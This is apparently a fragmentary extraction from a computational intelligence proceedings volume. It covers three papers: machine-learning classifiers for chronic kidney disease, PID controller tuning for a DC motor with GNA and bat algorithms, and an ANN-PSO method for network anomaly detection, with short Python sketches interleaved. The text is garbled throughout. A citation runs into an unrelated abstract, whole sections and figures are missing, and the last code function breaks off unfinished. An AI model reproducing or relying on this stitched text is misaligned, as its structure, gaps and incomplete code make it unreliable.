20. Dey, S., Gourisaria, M. K., Rautray, S. S., & Pandey, M. (2021). Segmentation of Nuclei in
microscopy images across varied experimental systems. 87–95.
21. Rautaray, S. S., Dey, S., Pandey, M., & Gourisaria, M. K. (2020). Nuclei segmentation in
cell images using fully convolutional neural networks. International Journal on Emerging and
Technology, 11(3), 731–737.
22. Abraham, A. (2005). Artificial neural networks. In Handbook of Measuring System Design.
Wiley.
23. Sharma, S., Gourisaria, M. K., Rautray, S. S., Pandey, M., & Patra, S. S. (2020). ECG classi-
fication using deep convolutional neural networks and data analysis. International Journal of
Advanced Trends in Computer Science and Engineering, 9, 5788–5795.
24. Tsangaratos, P., & Ilia, I. (2016). Comparison of a logistic regression and Naïve Bayes classifier
in landslide susceptibility assessments: The influence of models complexity and training dataset
size. CATENA, 145, 164–179. https://doi.org/10.1016/j.catena.2016.06.004
25. Alzubi, O., Alzubi, J., Tedmori, S., Rashaideh, H., & Almomani, O. (2018). Consensus-based
combining method for classifier ensembles. The International Arab Journal of Information
Technology, 15(1), 76–86.
26. Mavroforakis, M. E., & Theodoridis, S. (2006). A geometric approach to Support Vector
Machine (SVM) classification. IEEE Transactions on Neural Networks, 17(3), 671–682. https://
doi.org/10.1109/TNN.2006.873281
27. Swain, P. H., & Hauska, H. (1977). The decision tree classifier: Design and potential. IEEE
Transactions on Geoscience Electronics, 15(3), 142–147. https://doi.org/10.1109/TGE.1977.
6498972
28. Azar, A. T., Elshazly, H. I., Hassanien, A. E., & Elkorany, A. M. (2014). A random forest
classifier for lymph diseases. Computer Methods and Programs in Biomedicine, 113(2), 465–
473. https://doi.org/10.1016/j.cmpb.2013.11.004
29. Hosseinzadeh, H., Razzazi, F., & Haghbin, A. (2015). A self training approach to auto-
matic modulation classification based on semi-supervised online passive aggressive algorithm.
Abstract The kidney is a vital organ: it removes waste and excess fluid from the
body, clears the acids secreted by the body's cells, and thereby maintains the balance
of salts, water and minerals such as potassium, sodium, calcium and phosphorus in
our blood. Kidneys also produce hormones that keep our blood pressure in control,
stimulate the production of red blood cells, and keep our bones robust and resilient.
Hence, taking care of and maintaining the proper health of our kidneys is of utmost
importance. Prediction and identification of kidney diseases at an early stage gives us
an advantage and prompts us to take the further required medical treatment. The dataset
imported has been preprocessed by removing all the redundant features, and contrasting
data mining classification methods, namely decision tree, random forest (RF), SVM, Naïve
Bayes and k-NN, are implemented in this paper for the discernment and screening of the
disease. The prediction accuracy of each classification technique has been compared
and exhibited with different performance metrics: specificity, sensitivity, negative
predictive value, positive predictive value and accuracy. The random forest classifier
achieved the highest accuracy of 98.81%, surpassing all the other classification techniques.
1 Introduction
Health care is the maintenance and improvement of health through the prevention,
detection, treatment and cure of disease. Without genuine and proper health care,
the population is at far greater risk. The major challenge, however, is to supply
advanced medical care and services at an affordable monetary cost. Diseases
diagnosed at an early stage will spare the
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 735
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_59
736 R. Pramanik et al.
victim from the cost of complicated treatments, and thus the expenditure is expected
to drop significantly. Chronic kidney disease (CKD) is the disorder in which
the kidneys are damaged, lose their ability to filter the blood properly and allow
wastes to pile up in the body. The disorder is termed 'chronic' because the
kidneys are damaged steadily over a period of time. The most challenging task is
handling the enormous amount of input needed to supervise the patient's information
and healthcare statistics. So the required filtering of the data is applied, and different
data mining classification approaches, such as random forest, decision tree,
SVM, KNN and Naïve Bayes, are exercised to locate and intercept the
disease [1]. The data employed here was recorded in India over a period of two
months and has 25 features, for example blood pressure, sugar and many
more.
This research paper is organized as follows. An outline of the chronic kidney
disorder is presented in Sect. 2. Section 3 supplies an account of the literature
on kidney disorders. The working flowchart is described in Sect. 4. An abridged
analysis of the classification techniques SVM, decision tree, RF, Naïve Bayes
and KNN is given in Sect. 6. Section 7 analyses the results of the various models
used for prediction. The conclusion, a quick survey of the document and future
work that can be done based on this research are provided in Sect. 8.
2 Chronic Kidney Disease

Chronic kidney disease is a long-term condition in which the kidneys fail to work
properly and perform their basic functions. The risk of developing this disease
increases with age. Anyone can be affected by it, but it is more common among
people who are black or hail from countries of South Asia. Several factors that
increase the risk of CKD are mentioned in Fig. 1.
Prediction of CKD will help to initiate the required treatment from an early
stage and thus reduce both the expenditure and the risk of further complicated
treatment procedures. There are a total of five stages [2] of CKD, namely:
Stage 1: mild kidney damage, protein in urine.
Stage 2: fatigue, low appetite, weakness.
Inferring the Occurrence of Chronic Kidney Failure … 737
Stage 3: anaemia (low RBC count), high blood pressure, bone disease.
Stage 4: nausea and vomiting, complete loss of appetite.
Stage 5: risk of heart disease and stroke, kidney failure.
In 2011, 63,538 CKD cases were registered by the CKD Registry of India, and
the numbers are growing significantly each year [3]. Approximately 10% of
the world's population has chronic kidney disease (CKD), and
every year millions die due to the shortage of inexpensive treatment. As per the
Global Burden of Disease study of 2010, CKD ranked 27th in the
list of causes of global death in 1990, and by 2010 it had risen to
18th. Only HIV and AIDS have risen this quickly in the rankings [4].
3 Literature Survey
Aljaaf et al. studied the diagnosis of chronic kidney disorder at an early stage;
a total of four machine learning classification techniques were used [5]. Almansour
et al. used SVM and ANN for the detection of CKD; a dataset comprising 400 samples
and 24 features was employed [6]. Xiao et al. predicted the seriousness of chronic
kidney disorder using nine machine learning models, including ridge regression,
logistic regression and random forest; the best performance, an AUC of 0.873, was
given by logistic regression [7]. Charleonnan et al. inspected four machine learning
techniques, LR, KNN, SVM and decision tree, to predict the presence of chronic kidney
disease [8]. Saha et al. predicted the presence of CKD using ML classification
methods such as logistic regression, Naïve Bayes, multilayer perceptron, Adam-DNN
and random forest; the highest accuracy of 97.35% was achieved by Adam-DNN [9].
Sinha et al. compared the performance of KNN and support vector machine, in terms of
precision, execution time and accuracy, for the prediction of chronic kidney disorder;
the accuracy of SVM was observed to be less than that of K-nearest neighbour [10].
Qin et al. explored six classification methods, including Naïve Bayes, SVM, feed-forward
neural network, random forest and KNN, of which random forest ranked first with the
highest accuracy of 99.75% [11]. Almasoud et al. performed the ANOVA, Cramér's V and
Pearson's correlation tests to remove all the unnecessary features from the dataset,
and after training various algorithms such as gradient boosting, logistic regression,
random forest and SVM, 99.1% accuracy was achieved [12]. Rubini et al. used three
classifiers, namely logistic regression, radial basis function and multilayer perceptron,
and put forward a new chronic kidney disease dataset. The outcome of the experiment is
reported in terms of accuracy, sensitivity, F-score, specificity and type I and II errors;
the agreement between the expert classification and the classifier is measured by the kappa value
[13]. Devika et al. performed classification with several machine learning models,
random forest, K-nearest neighbour and Naïve Bayes, for chronic kidney disease
diagnosis, with performance measured by execution time, accuracy and precision;
random forest was found to outperform the other two classification algorithms used
in the experiment [14].
4 Proposed Model
The main aim of the models is to predict whether a patient is suffering from CKD or
not, based on the various features provided in the dataset. The complete
workflow is illustrated in Fig. 2. First, the raw data is imported,
and pre-processing techniques such as removal of outliers, conversion of object types to
numerical types and imputation of missing values are performed. The attributes are
filtered, and only the necessary features are passed on to the classification models so
that better accuracy is achieved [15]. The classification algorithms used here are
LR, SVM, Naïve Bayes, KNN, decision tree and RF. In machine learning, a vast range
of metrics is available to measure the performance of the models; in this approach,
the performance metrics of sensitivity, specificity, PPV, NPV and accuracy have been
employed.
On analyzing the dataset, the numbers of numerical and categorical variables are
found to be 12 and 13, respectively [16]. However, a few numerical variables are
found to be of object type because of the presence of garbage characters. Hence,
these variables are converted to numerical type after replacing the garbage
characters with NaN values. The total number of missing values in each column is
computed, and a large amount of data is found to be missing, the highest being RBC
with a total of 107 missing values. As the number of samples in this dataset is
considerably small, deleting every row containing missing values would not be
efficient, so the missing values of numerical and categorical columns are imputed
[17] with the median and mode, respectively. Next, the number of outliers in each
data column is examined using z-score analysis; almost all attributes have outliers,
which are then imputed with the median [18].
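The imputation steps described above can be sketched as follows; the column values and z-score threshold are illustrative, not taken from the CKD dataset:

```python
import numpy as np

def impute_with_median(col, z_thresh=3.0):
    """Replace missing values and z-score-flagged outliers of a numeric
    column with the column median, as described above."""
    col = col.astype(float)
    mu, sigma = np.nanmean(col), np.nanstd(col)
    z = (col - mu) / sigma                     # z-score of each entry
    med = np.nanmedian(col)
    out = col.copy()
    out[np.abs(z) > z_thresh] = med            # outliers  -> median
    out[np.isnan(out)] = med                   # missing   -> median
    return out

bp = np.array([80, 76, 82, np.nan, 300, 78])   # toy blood-pressure column
print(impute_with_median(bp, z_thresh=1.5))    # 300 and the gap become 80
```

Categorical columns would use the mode instead of the median, as the paper states.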
For dimensionality reduction, all non-numerical categorical attributes are
converted to numeric using binary values [19]. The correlation between the attributes
is displayed in the heatmap in Fig. 3, and attributes with an absolute correlation
coefficient greater than 0.6 are dropped [20].
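The 0.6-threshold feature drop can be sketched as a greedy filter over the absolute correlation matrix; the feature names and synthetic data below are illustrative:

```python
import numpy as np

def drop_correlated(X, names, threshold=0.6):
    """Keep a feature only if its |corr| with every earlier kept
    feature is at most the threshold."""
    corr = np.abs(np.corrcoef(X, rowvar=False))
    keep = []
    for j in range(X.shape[1]):
        if all(corr[j, k] <= threshold for k in keep):
            keep.append(j)
    return [names[j] for j in keep]

rng = np.random.default_rng(1)
a = rng.normal(size=200)
b = a + 0.05 * rng.normal(size=200)      # nearly a duplicate of a
c = rng.normal(size=200)                 # independent feature
X = np.column_stack([a, b, c])
print(drop_correlated(X, ["a", "b", "c"]))   # b is dropped: ['a', 'c']
```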
6 Classification Methods
(Figure: decision tree structure, showing a split point and internal nodes.)
Logistic regression is one of the most used methods for binary classification
problems; its benefits and drawbacks are listed in Table 2. The logistic
function used in this technique is the basis for its name. Statisticians
developed the sigmoid, or logistic, function to describe population growth.
It is an S-shaped curve that can take any real-valued input and map it into
the range 0–1. Logistic regression can be further classified into different
types, such as ordinal LR, multinomial LR and binary LR [23]. The logistic
function that forms the basis of logistic regression is depicted by the equation
σ(z) = p = 1 / (1 + e^(−z))    (1)
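Eq. (1) in code, showing how any real-valued input is squashed into the range (0, 1):

```python
import numpy as np

def sigmoid(z):
    """Logistic function of Eq. (1): sigma(z) = 1 / (1 + e^(-z))."""
    return 1.0 / (1.0 + np.exp(-z))

print(sigmoid(0.0))                      # 0.5, the decision boundary
print(sigmoid(np.array([-6.0, 6.0])))    # both outputs lie strictly in (0, 1)
```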
Naïve Bayes is a Bayes-theorem-based algorithm used to solve classification
problems. It builds machine learning models that are very fast to train and
produce predictions quickly. It is one of the simplest and most fruitful
algorithms, but it has downsides too, all of which are stated in Table 3.
Bayes' theorem is computed as
P(A|B) = P(B|A) P(A) / P(B)    (2)
The support vector machine, employed for both classification and regression, is one
of the most commonly used supervised learning algorithms. Its main objective
is to produce a decision boundary, called a hyperplane [24], that divides the
n-dimensional feature space into classes so that every new input is assigned to
the right category. Table 4 lists the benefits and downsides of this machine
learning technique.
6.5 KNN
KNN is one of the most elementary machine learning algorithms and has no
parameters. In this approach, the similarity between a new case and the existing
cases is checked, and the new case is assigned to a class accordingly. Though
mostly employed for classification, KNN can also be used to predict the outcome
of regression problems. In KNN, the training data is not learned from
straightaway, and hence the term lazy learner is given to this technique. The
drawbacks and benefits of this classification technique are stated in Table 5.
Random forest is an ensemble approach in which various classifiers are blended so
that a complicated problem can be solved and the model performance increases
significantly. Rather than relying on the prediction of a single decision tree,
as shown in Fig. 5, the predictions of many decision trees are taken into
consideration, and the final result is produced by averaging or by majority
vote. Table 6 lists the pros and cons of random forest.
7 Examination of Performance
The confusion matrix, also called the error matrix, is a table very frequently
used to measure the capability of machine learning classification methods.
The terminology of the confusion matrix shown in Table 7 is explained below:
True Positive (TP): the actual class is positive and the prediction is positive.
True Negative (TN): the actual class is negative and the prediction is negative.
False Positive (FP): the actual class is negative but the prediction is positive.
False Negative (FN): the actual class is positive but the prediction is negative.
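From these four counts, all five performance metrics used in this paper follow directly; the counts below are illustrative:

```python
def metrics_from_confusion(tp, tn, fp, fn):
    """Sensitivity, specificity, PPV, NPV and accuracy from the four counts."""
    return {
        "sensitivity": tp / (tp + fn),          # true positive rate
        "specificity": tn / (tn + fp),          # true negative rate
        "ppv": tp / (tp + fp),                  # positive predictive value
        "npv": tn / (tn + fn),                  # negative predictive value
        "accuracy": (tp + tn) / (tp + tn + fp + fn),
    }

print(metrics_from_confusion(tp=50, tn=30, fp=2, fn=2))
```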
The confusion matrices of all the classification techniques employed to predict
the result are displayed in Fig. 6.
The accuracies of the six classification methods and their comparison graph are
plotted in Fig. 7.
(Fig. 7: accuracy comparison of the six classifiers, LR, decision tree, Naïve Bayes,
SVM, KNN and random forest; the plotted accuracies are 75%, 92.86% (three classifiers),
96.42% and 98.81%, with random forest highest at 98.81%.)
Table 9 lists a comparative analysis of the performance measures reported by other
papers on predicting chronic kidney disease using various data mining
classification techniques.
References
1. Gourisaria, M. K., Das, S., Sharma, R., Rautaray, S. S., & Pandey, M. (2020). A deep learning
model for Malaria disease detection and analysis using deep convolutional neural networks.
International Journal of emerging Technologies, 11(2), 699–704.
2. Stages of CKD. https://www.healthline.com/health/ckd-stages. Last accessed 26 Jan 2021.
3. Chronic Kidney Disease (CKD). Prevalence and Management in India. https://www.med
india.net/health_statistics/diseases/chronic-kidney-disease-ckd-india.asp. Last accessed 26 Jan
2021.
4. Global Facts: About Kidney Disease. https://www.kidney.org/kidneydisease/global-facts-
about-kidney-disease. Last accessed 26 Jan 2021
5. Aljaaf, A. J., Al-Jumeily, D., Haglan, H. M., Alloghani, M., Baker, T., Hussain, A. J., & Musta-
fina, J. (2018). Early prediction of chronic kidney disease using machine learning supported
by predictive analytics. In IEEE congress on evolutionary computation (CEC) (pp. 1–9). IEEE
6. Almansour, N. A., Syed, H. F., Khayat, N. R., Altheeb, R. K., Juri, R. E., Alhiyafi, J., & Olatunji,
S. O. (2019). Neural network and support vector machine for the prediction of chronic kidney
disease: A comparative study. Computers in Biology and Medicine, 109, 101–111.
7. Xiao, J., Ding, R., Xu, X., Guan, H., Feng, X., Sun, T., & Ye, Z. (2019). Comparison and
development of machine learning tools in the prediction of chronic kidney disease progression.
Journal of Translational Medicine, 17(1), 1–13.
8. Charleonnan, A., Fufaung, T., Niyomwong, T., Chokchueypattanakit, W., Suwanna-wach, S., &
Ninchawee, N. (2016). Predictive analytics for chronic kidney disease using machine learning
techniques. In Management and Innovation Technology International Conference (MITicon)
(pp. 80–83), Bang-San
9. Saha, A., Saha, A., & Mittra, T. (2019). Performance measurements of machine learning
approaches for prediction and diagnosis of chronic kidney disease (CKD). In Proceedings
of the 2019 7th international conference on computer and communications management
(pp. 200–204).
10. Sinha, P., & Sinha, P. (2015). Comparative study of chronic kidney disease prediction using
KNN and SVM. International Journal of Engineering Research and Technology, 4(12), 608–
612.
11. Qin, J., Chen, L., Liu, Y., Liu, C., Feng, C., & Chen, B. (2019). A machine learning methodology
for diagnosing chronic kidney disease. IEEE Access, 8, 20991–21002.
12. Almasoud, M., & Ward, T. E. (2019). Detection of chronic kidney disease using machine
learning algorithms with least number of predictors. International Journal of Soft Computing
and Its Applications, 10(8).
13. Rubini, L. J., & Eswaran, P. (2015). Generating comparative analysis of early stage prediction
of Chronic Kidney Disease. International Journal of Modern Engineering Research (IJMER),
5(7), 49–55.
14. Devika, R., Avilala, S. V., & Subramaniyaswamy, V. Comparative study of classifier for chronic
kidney disease prediction using naive Bayes, KNN and random forest. In 2019 3rd International
conference on computing methodologies and communication (ICCMC) (pp. 679–684). IEEE.
15. Das, S., Sharma, R., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). Heart disease
detection using core machine learning and deep learning techniques: A comparative study.
International Journal on Emerging Technologies., 11(3), 531–538.
16. Categorical Variable. https://en.wikipedia.org/wiki/Categorical_variable. Last accessed 25 Jan
2021.
17. Anand, A., Anand, H., Rautaray, S. S., Pandey, M., & Gourisaria, M. K. (2020). Analysis and
prediction of chronic heart diseases using machine learning classification models. International
Journal of Advanced Trends in Computer Science and Engineering, 9(5), 8479–8487, 227.
18. Machine Learning Standardization. https://towardsai.net/p/machine-learning/machine-lea
rning-standardization-z-score-normalization-with-mathematics. Last accessed 27 Jan 2021.
19. Mishra, S., Pandey, M., Rautaray, S. S., & Gourisaria, M. K. (2020). A survey on big data analyt-
ical tools and techniques in health care sector. International Journal on Emerging Technologies.,
11(3), 554–560.
20. Feature Selection For Machine Learning in Python. https://towardsdatascience.com/feature-
selection-for-machine-learning-in-python-filter-methods-6071c5d267d5. Last accessed 26 Jan
2021.
21. Decision Trees in Machine Learning. https://towardsdatascience.com/decision-trees-in-mac
hine-learning-641b9c4e8052. Last accessed 20 Jan 2021.
22. Sharma, R., Gourisaria, M. K., Rautray, S. S., Pandey, M., & Patra, S. S. (2020). ECG classi-
fication using deep convolutional neural networks and data analysis. International Journal of
Advanced Trends in Computer Science and Engineering, 9(4), 5788–5795.
23. Logistic Regression for Machine Learning. https://machinelearningmastery.com/logistic-reg
ression-for-machine-learning/. Last accessed 20 Jan 2021.
24. SVM- Introduction to Machine Learning. https://towardsdatascience.com/support-vector-mac
hine-introduction-to-machine-learning-algorithms-934a444fca47. Last accessed 21 Jan 2021.
25. Evaluating Categorical Models. https://towardsdatascience.com/evaluating-categorical-mod
els-ii-sensitivity-and-specificity-e181e573cff8. Last accessed 24 Jan 2021.
26. Positive and Negative Predictive Values. https://en.wikipedia.org/wiki/Positive_and_negative_
predictive_values. Last accessed 24 Jan 2021.
27. Machine Learning-Performance Metrics. https://www.tutorialspoint.com/machine_lear
ning_with_python/machine_learning_algorithms_performance_metrics.htm. Last accessed
24 Jan 2021.
Comparative Analysis for Optimal
Tuning of DC Motor Position Control
System
1 Introduction
The DC motor, i.e. the direct current motor, is a common component in
many electronic devices. It works according to the Lorentz force law: the DC motor
assembly has a permanent magnet within which a conductive coil, called the armature,
is placed. At the centre, there is a shaft which facilitates rotation. The armature
is connected to commutator rings, which keep it in contact with the supply at all
times, and brushes connect the supply to the commutator rings. Another type of motor called the
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 749
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_60
750 A. Singhal et al.
used, and Sect. 5 shows the objective function that is being optimized, followed by
simulation and results in Sect. 6. The conclusion is presented in Sect. 7.
θ(s)/v(s) = 1.2 / (0.00077 s^3 + 0.0539 s^2 + 1.441 s)    (1)
3 Controller
3.1 PID
The three parameters of a PID controller are K_p, K_i and K_d. The proportional
constant K_p produces an output that corrects the error in proportion to it. The
integral constant K_i helps diminish the error by integrating it over time until it
reaches zero. The derivative constant K_d anticipates the future behaviour of the
error by using its rate of change. The general equation of the PID controller is
given by Eq. (2)
G_PID = K_p e(t) + K_i ∫₀^t e(t) dt + K_d de(t)/dt    (2)
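To make Eqs. (1) and (2) concrete, the closed loop can be simulated with a simple forward-Euler sketch; the gains below are illustrative placeholders, not the tuned values reported in Table 1:

```python
# Plant of Eq. (1): theta(s)/v(s) = 1.2 / (0.00077 s^3 + 0.0539 s^2 + 1.441 s),
# i.e. 0.00077*theta''' + 0.0539*theta'' + 1.441*theta' = 1.2*v

def simulate_pid(kp, ki, kd, t_end=2.0, dt=1e-4):
    """Unit-step closed-loop response of the plant under PID control,
    integrated with forward Euler (gains here are illustrative)."""
    theta = dtheta = ddtheta = 0.0     # position and its derivatives
    integral = 0.0
    prev_err = 1.0                     # error starts at 1 for a unit step
    y = []
    for _ in range(int(t_end / dt)):
        err = 1.0 - theta
        integral += err * dt
        deriv = (err - prev_err) / dt  # finite-difference derivative, Eq. (2)
        prev_err = err
        v = kp * err + ki * integral + kd * deriv
        dddtheta = (1.2 * v - 0.0539 * ddtheta - 1.441 * dtheta) / 0.00077
        ddtheta += dddtheta * dt
        dtheta += ddtheta * dt
        theta += dtheta * dt
        y.append(theta)
    return y

y = simulate_pid(kp=10.0, ki=1.0, kd=0.05)
print(round(y[-1], 3))   # settles near the 1-rad reference
```

From a trace like `y`, the rise time, settling time and overshoot compared in the paper can be read off.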
3.2 PID-N
The derivative block used in a PID controller introduces noise. To avoid this,
a filtered derivative loop with filter coefficient N_i can be used; the
feedback loop has 1/s in the feedback path and N_i in the forward path.
The diagram of PID-N is shown in Fig. 1.
The PID-N controller produces output according to Eq. (3)
G_PID−N = K_p + K_i/s + K_d N_i/(1 + N_i/s)    (3)
3.3 F-PID
The fractional-order PID (F-PID) controller generalizes the integral and derivative
actions of the PID controller to non-integer orders λ and μ:

G = K_p + K_i/s^λ + K_d s^μ    (μ, λ > 0)    (4)
4 Algorithms
The global neighborhood algorithm (GNA) was proposed by Alazzam in 2013 [15]. The
initial population is randomly generated and its fitness is calculated. The
population is then ordered by fitness, and the best solution is assigned as the
global best solution. A new population is then created, in which the first 50% is
generated in the neighborhood of the global best solution and the remaining 50% is
randomly generated. Fitness calculation and ordering by fitness are repeated. If
the current best solution is better than the global best solution, the current best
becomes the global best, and this procedure continues until the iterations
end.
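The steps above can be sketched as follows; the population size, iteration count, neighborhood radius and test function are illustrative:

```python
import random

def gna_minimize(f, bounds, pop_size=40, iters=20, radius=0.1):
    """Global neighborhood algorithm sketch: each generation, half the
    population is drawn around the global best, half is random."""
    def rand_sol():
        return [random.uniform(lo, hi) for lo, hi in bounds]
    def near(best):
        return [min(max(x + random.uniform(-radius, radius) * (hi - lo), lo), hi)
                for x, (lo, hi) in zip(best, bounds)]
    pop = [rand_sol() for _ in range(pop_size)]
    best = min(pop, key=f)
    for _ in range(iters):
        pop = [near(best) for _ in range(pop_size // 2)] + \
              [rand_sol() for _ in range(pop_size - pop_size // 2)]
        cand = min(pop, key=f)
        if f(cand) < f(best):        # keep the better of current and global best
            best = cand
    return best

random.seed(0)
sphere = lambda p: sum(x * x for x in p)
best = gna_minimize(sphere, bounds=[(-5, 5)] * 2)
print(sphere(best))   # close to the optimum at the origin
```

In the paper, `f` would be the ITAE of the closed-loop response and the bounds would cover the controller gains.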
The bat algorithm (BA) was developed by X.-S. Yang [16]. Bats use echolocation to
find their prey while flying at velocity v_i and position p_i, emitting waves of
frequency f at a pulse rate c_i and loudness L_i. Initially, the population is
generated with random velocities and positions, and its fitness is evaluated. The
velocity and position of each bat are then updated according to Eqs. (5)–(7), where
β is a random number between 0 and 1 and the best solution is denoted p∗. Next, a
random number is generated; if it is greater than c_i, a solution among the best
solutions is selected and a new solution is created according to Eq. (8), where the
average loudness of the bats is represented by L̄^t; otherwise a random solution is
generated. The fitness is evaluated again, and another random number is generated.
If the new solution has better fitness than the best solution and the generated
random number is less than that bat's loudness, the solution is accepted, the
pulse rate and loudness are updated according to Eq. (9), and this solution becomes
the best solution. The process repeats until the iteration count expires.
f_i = f_low + (f_high − f_low)β    (5)
v_i^t = v_i^(t−1) + (p_i^t − p∗) f_i    (6)
p_i^t = p_i^(t−1) + v_i^t    (7)
p_new = p_old + ε L̄^t    (8)
L_i^(t+1) = α L_i^t,  c_i^(t+1) = c_i^0 [1 − exp(−γ t)]    (9)
In this paper, the controller parameters have been determined and tuned using GNA
and BA. The objective function used to obtain the optimal values of these
parameters is the integral time absolute error (ITAE), which is the function to
be minimized. The expression for ITAE is shown in Eq. (10)
ITAE = ∫₀^t_ss t |e(t)| dt    (10)
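A discrete approximation of Eq. (10) over a sampled error trace can be sketched as:

```python
import math

def itae(t, e):
    """Discrete approximation of ITAE = integral of t*|e(t)| dt, Eq. (10)."""
    total = 0.0
    for i in range(1, len(t)):
        total += t[i] * abs(e[i]) * (t[i] - t[i - 1])
    return total

# toy error trace e(t) = exp(-t), sampled every 1 ms up to t = 5 s
ts = [i * 1e-3 for i in range(5001)]
es = [math.exp(-t) for t in ts]
print(round(itae(ts, es), 3))   # analytic value on [0, 5] is about 0.96
```

The optimizers would evaluate this quantity on the simulated closed-loop error for each candidate gain set.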
For BA and GNA, the population and iteration conditions were as follows:
Maximum population: 40, Maximum iteration: 20
BA parameters:
Maximum frequency: 1, Minimum frequency: 0, α: 0.5, γ : 0.5
The value of the controller parameters is as shown in Table 1.
The value of the transient response parameters for all the controllers tuned using
GNA and BA is shown in Table 2.
The transient response using GNA for controllers has been plotted in Fig. 2.
Table 2 Transient response parameters of DC motor position control

Algorithm | Rise time (s) | Settling time (s) | Overshoot (%)
GNA PID | 0.0889 | 0.1961 | 2.1233
GNA F-PID | 0.0821 | 0.1283 | 1.5558
GNA PID-N | 0.0782 | 0.1262 | 0.1045
BAT PID | 0.0829 | 0.2265 | 4.9593
BAT F-PID | 0.0729 | 0.1815 | 4.2854
BAT PID-N | 0.0802 | 0.1284 | 0.5336
(Fig. 2: step responses, angular displacement in radians, of the GNA-tuned PID,
F-PID and PID-N controllers against the step input.)
(Fig. 3: step responses, angular displacement in radians, of the BA-tuned PID,
F-PID and PID-N controllers against the step input.)
The transient response using BA for controllers has been plotted in Fig. 3.
7 Conclusion
In this paper, a comparative study of the transient response for PID, F-PID and PID-N
controllers was performed. The controller parameters were obtained and tuned using
GNA and BA. The response was plotted, and parameters like rise time, overshoot
(%) and settling time were obtained and compared. It was found that F-PID gave
better performance than PID. Even though the BA-tuned F-PID gave a slightly
better rise time than the PID-N results for both BA and GNA, its overshoot
and settling time were much higher. Hence, the PID-N controller gives the best
overall performance among the three. It was also found that tuning the controllers
with GNA gave better overall performance than with BA.
A Hybrid Approach of ANN-PSO
Technique for Anomaly Detection
Abstract As of late, AI-based anomaly detection has found new interest, as the
number and complexity of new breaches keep increasing; consequently, newer
approaches to evolve and best deal with the attacks are essential. We propose
artificial neural networks to devise a novel cyber intrusion detection method. While
ANNs are popularly trained by back propagation and genetic algorithms, we propose
the particle swarm optimisation method to help resolve issues such as a slow
convergence rate and easily getting trapped in local minima, which arise with back
propagation and genetic algorithms. The proposed approach utilises the standard NSL-
KDD data-set used in the field of anomaly detection. The test results show that our
strategy performs better than a number of the current procedures, including ANN-BP,
ANN-GA, etc., and gives accuracy in the range of 97–99%.
1 Introduction
The recent years have seen a growing use of the internet, and with this, an increasing
number of intrusion attacks. In 2020, with the onset of the COVID-19 pandemic and
the sudden and urgent need to digitise and move to online methods of communi-
cation, the development of a model to battle these attacks is necessary. To combat
the attacks, multiple intrusion detection systems (IDSs) have been developed [1–3]
which monitor networks and record any malicious activities that are observed with
a security information system and an event managing system. Intrusion detection
systems are mainly categorised as follows [4]:
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 757
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_61
758 S. Dahiya et al.
• network intrusion detection systems (NIDSs) are responsible for detecting
malicious activities present in the incoming network traffic.
• host-based intrusion detection systems (HIDSs) [5] are concerned with monitoring
the activities related to the files present on the operating system.
An IDS monitors the given traffic and compares it to the attack information
already available, making it vital for high-security systems. On the detection of
certain anomalies, the IDS transmits an alert signal to the administrator. These are
some examples of anomalies:
2 Related Work
The KDD Cup 99 dataset, which is based on DARPA'98, has not been widely
appreciated, as shown by McHugh [15]. The simulated attack types fall under the
categories: Denial of Service attacks (DoS), User to Root attacks (U2R), Remote
to Local attacks (R2L), and Probing attacks (Probe).
A three-layer MLP was set up for this research process. One of the metrics used,
accuracy, ranged from 87.2% for the normal dataset up to a highest of 99.84% for
U2R. Although the result achieved for U2R is high, the accuracies for the other
datasets vary greatly, from 92.31% for R2L and 94.2% for Probe to 96.69% for
DoS, and an approach is needed to standardise them into the same range for better
reliability.
In the studies performed by Taher, Yasin Jisan, Rahman, 2019 [16], various
machine learning algorithms were compared against each other with a focus on com-
paring the two specific supervised methods—Artificial Neural Network and Support
Vector Machine.
In this study, the artificial neural network was trained with backpropagation, which
improves the output by taking the error into account on each pass. SVM specifies a
hyperplane that defines the characteristics of classifiers and can be used for classifi-
cation; it is also helpful in the detection of outliers.
The two algorithms were compared using criteria of accuracy. The dataset used
to work on the intrusion detection problem was the NSL-KDD [17] dataset. It is
observed that ANN detects anomalies at a higher percentage of accuracy than SVM
and also has a higher stance in comparison with pre-existing models.
In another study conducted by Latah, Majd, Tokerd, 2018 [18], various super-
vised learning techniques, namely, Naive Bayes (NB), decision trees (DT), random
forest (RF), extreme learning machine (ELM), support vector machines (SVMs),
K nearest-neighbor (KNN), neural networks (NNs), linear discriminant analysis
(LDA), AdaBoost, RUSBoost, BaggingTrees, and LogitBoost were implemented
and compared against each other. The principal component analysis (PCA) method
was utilised for feature selection.
Through the study, it was observed that the decision tree-based approach showed
optimum performance in terms of accuracy, whereas bagging and boosting
performed better than K-nearest neighbors (KNN), extreme learning machine
(ELM), artificial neural networks (ANNs), support vector machines (SVMs), linear
discriminant analysis (LDA), and random forest (RF).
Through these results, it can be gathered that many improvements have been made,
and many more can be made, in using supervised measures to detect anomalies with
sufficiently good accuracy.
3 Proposed Method
of the algorithm, the location and position of each particle are updated as per its
previous knowledge, its experience, and the experience of its neighbours.
A particle is composed of three vectors: the current location/position of the particle
(x-vector), the position of the best solution found so far (p-best), and the velocity with
which the particle will travel if not updated (v-vector). All the particles are moved
towards the best location found by an individual so far (personal best) and the global
best position (global best) obtained so far by all particles, which is done by adding
the velocity vector to the position vector to get a new position vector:
X_i^new = X_i + V_i        (1)

Once a particle has calculated its new X_i, it evaluates the fitness at the new
position. If the new fitness is better than the p_best fitness, then p_best is
updated to this new position.
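The update and p_best replacement described above can be sketched as follows; the inertia and acceleration coefficients and the sphere fitness function are illustrative assumptions, not values taken from the paper:

```python
import random

# One PSO step: velocity update, position update (Eq. (1)), p_best test.
W, C1, C2 = 0.7, 1.5, 1.5          # inertia and acceleration coefficients (assumed)

def fitness(x):
    """Stand-in objective: sphere function, lower is better."""
    return sum(xi * xi for xi in x)

def pso_step(x, v, p_best, g_best):
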